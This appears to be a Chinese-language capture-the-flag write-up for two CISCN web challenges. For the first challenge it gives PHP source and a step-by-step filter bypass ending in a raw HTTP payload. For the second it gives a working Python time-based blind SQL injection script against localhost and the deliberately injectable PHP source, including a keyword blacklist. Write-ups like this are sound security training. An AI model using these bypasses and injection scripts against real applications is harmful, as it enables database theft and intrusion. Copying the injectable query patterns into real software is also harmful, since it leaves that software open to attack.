@highKer2月前

06/10
14:54
web

ciscn_1/2_web

day_2

web_2

echo "Null ... Null ... Null ... ";

if(isset($_GET['src'])) {
    die(highlight_file('index.php', true));
}

error_reporting(0);
if($_REQUEST){
    foreach ($_REQUEST as $key => $value) {
        if(preg_match('/[a-zA-Z]/i', $value)) die('Hello Hack.');
    }
}

if($_SERVER){
    if(preg_match('/cyber|flag|ciscn/i', $_SERVER['QUERY_STRING'])) die('Hello Hack..');
}

if(isset($_GET['cyber'])){
    if(!(substr($_GET['cyber'], 32) === md5($_GET['cyber']))){ 
        die('Hello Hack...');
    }else{
        if(preg_match('/^ciscnsec$/', $_GET['ciscn']) && $_GET['ciscn'] !== 'ciscnsec'){
            $getflag = file_get_contents($_GET['flag']);
        }else
            die('Hello Hack....');
        if(isset($getflag) && $getflag === 'security'){
            include 'flag.php';
            echo $flag;
        }else die('Hello Hack.....');
    }
}

首先是第一个checkpost上去一个与key一样的数字就行

第二个check因为是$_SERVER['QUERY_STRING']获取的uri,所以可以经过url编码直接搞定

第三个check很常见,提交数组格式完成绕过

第四个check关键点在于preg_match的多个模式,由于没有开启/d,那么用%0a换行即可

第五个check可以看看php伪协议,使用data://text/plain,security通过最后一段校验

最终payload

POST /?%63%79%62%65%72%5b%5d&%63%69%73%63%6e=%63%69%73%63%6e%73%65%63%0a&%66%6c%61%67=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%73%65%63%75%72%69%74%79 HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
Connection: close
Upgrade-Insecure-Requests: 1

ciscn=777&flag=777

web_1

很简单的一个time based sql injection,因为一开始直接告诉了表名和列名,并且预先知道flag格式与长度,可以只跑6~15位,直接贴payload

import requests
import time
url = "http://localhost:8888/web1/index.php"
list = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM{}_!@#$%^&*()"
flag = ""
payload = 'elt(ascii(substr((select(flag)from(ctf)),{q},1))={attack},sleep(1))'
    for a in range(6,16):
        for l in list:
            data = {"id":payload.format(q=a,attack=ord(l))}
            start = time.time()
            req = requests.post(url, data = data)
            if time.time()-start > 2:
                flag += l
                print flag
                break

下面是它的源码 

$dbuser='root';
//$dbuser='root';
$dbpass='root';
//$dbpass='root';
function safe($sql){
    $blackList = array(' ','||','#','-',';','&','+','or','and','`','"','insert','group','limit','update','delete','*','into','union','load_file','outfile','./');
    foreach($blackList as $blackitem){
        if(stripos($sql,$blackitem)){
            return False;
        }
    }
    return True;
}
if(isset($_POST['id'])){
    $id = $_POST['id'];
}else{
    die();
}
$db = mysql_connect("localhost",$dbuser,$dbpass);
if(!$db){
    die(mysql_error());
} 
mysql_select_db("ctf",$db);
if(safe($id)){
    $query = mysql_query("SELECT content from passage WHERE id = ${id} limit 0,1");
    if($query){
        $result = mysql_fetch_array($query);
        if($result){
            echo $result['content'];
        }else{
            echo "Error Occured When Fetch Result.";
        }
    }else{
        var_dump($query);
    }
}else{
    die("SQL Injection Checked.");
}

ciscn_1/2_web